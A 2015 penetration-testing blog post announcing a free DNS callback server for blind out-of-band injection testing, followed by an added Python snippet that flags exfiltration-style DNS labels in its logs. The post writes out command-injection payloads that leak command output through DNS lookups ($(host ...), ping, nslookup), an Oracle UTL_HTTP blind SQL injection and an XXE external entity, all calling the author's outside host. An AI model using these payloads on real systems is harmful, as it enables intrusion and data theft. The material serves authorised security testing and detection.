Monday, December 7, 2015

Out of Band Injection Testing: Free public NS Query server

For blind injection testing, and as a follow-up to the previous post, I'm launching a pilot version of my DNS server (free for now).

Open up your terminal and connect to sudo.co.il on port 5353:

~# nc sudo.co.il 5353

..snip..
Your match string [a-z0-9]{5,} only [e.g. nicolas]: nicolas

Example query: nicolas-59.sudo.co.il
{"date": "06-Dec-2015", "query": "nicolas-59.sudo.co.il", "client": "74.125.44.140#47744:", "time": "17:27:44.409"}

In my last web application penetration test, I was able to read the source code of a PHP application, and there was a call to the exec() function.
The problem was that I didn't get any output, and the usual "sleep 60" timing technique did not seem to work.

With my NS server I've successfully exfiltrated data over DNS queries.

PHP source:
exec('/opt/someprogram "$filename" "$tmppath"')

Successful injection:
/opt/someprogram blahblah.jpg /tmp/images$(host pwned.sudo.co.il)

Getting the wget version with this technique:
/opt/someprogram blahblah.jpg /tmp/image$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)

With this output:
{"date": "xx-xxx-2015", "query": "GNU-Wget-1134--a-non-interactive-network-retriever.sudo.co.il", "client": "xx.xx.xx.xx#63325:", "time": "xx:xx:xx.xxx"}
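From the defender's side, the same log shape makes this kind of traffic easy to spot. The Python below is an added example, not the server's code: it parses JSON lines in the format shown above (the sample lines and client addresses are constructed) and flags labels that are long or random-looking, which is how exfiltrated command output tends to appear in a DNS label.

```python
import json
import math
from collections import Counter

# Constructed sample log lines in the same JSON shape the post's server prints.
SAMPLE_LOG = """\
{"date": "06-Dec-2015", "query": "nicolas-59.sudo.co.il", "client": "74.125.44.140#47744:", "time": "17:27:44.409"}
{"date": "06-Dec-2015", "query": "www.sudo.co.il", "client": "203.0.113.9#53011:", "time": "17:28:01.002"}
{"date": "06-Dec-2015", "query": "GNU-Wget-1134--a-non-interactive-network-retriever.sudo.co.il", "client": "198.51.100.7#63325:", "time": "17:30:12.118"}
{"date": "06-Dec-2015", "query": "a3f9c1e7b2d84f06e5c9.sudo.co.il", "client": "198.51.100.7#63326:", "time": "17:30:12.553"}
"""

BASE_DOMAIN = "sudo.co.il"  # the zone the server answers for

def shannon_entropy(s: str) -> float:
    """Bits per character; hex or base32 blobs score high, words score low."""
    if not s:
        return 0.0
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def leftmost_label(query: str, base: str = BASE_DOMAIN) -> str:
    """Return the data-carrying part of the name (everything left of the base domain)."""
    q = query.rstrip(".").lower()
    suffix = "." + base
    if not q.endswith(suffix):
        return ""
    return q[: -len(suffix)]

def is_suspicious(label: str, min_len: int = 20, max_entropy: float = 3.5) -> bool:
    """Heuristic thresholds (assumed, tune per environment): long labels, or
    medium labels with high entropy, rarely come from normal lookups."""
    if not label:
        return False
    return len(label) >= min_len or (len(label) >= 12 and shannon_entropy(label) > max_entropy)

def flag_exfil(log_text: str):
    """Parse the server's JSON lines; return (client_ip, label) for suspicious queries."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        label = leftmost_label(rec["query"])
        if is_suspicious(label):
            client_ip = rec["client"].split("#")[0]  # strip the "#port:" suffix
            hits.append((client_ip, label))
    return hits
```

On the sample above only the wget banner and the hex-looking label are flagged; the short "nicolas-59" test query passes, so the thresholds separate the post's own examples as expected.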

It can be useful for command injection, for example:
$(host $RANDOM-test.sudo.co.il)
| ping $RANDOM-test.sudo.co.il |
&& nslookup nslookup-test.sudo.co.il &&

Blind SQL injection, like this:
SELECT * FROM products WHERE id=1||UTL_HTTP.request('http://sqli-test.sudo.co.il/') --

XML External Entity (XXE) injection:
<!ENTITY dtd SYSTEM "http://xxe-test.sudo.co.il/file.dtd">%dtd

and more.

For now, it's free but with limited support. (You may donate some $$$ if you love using it :)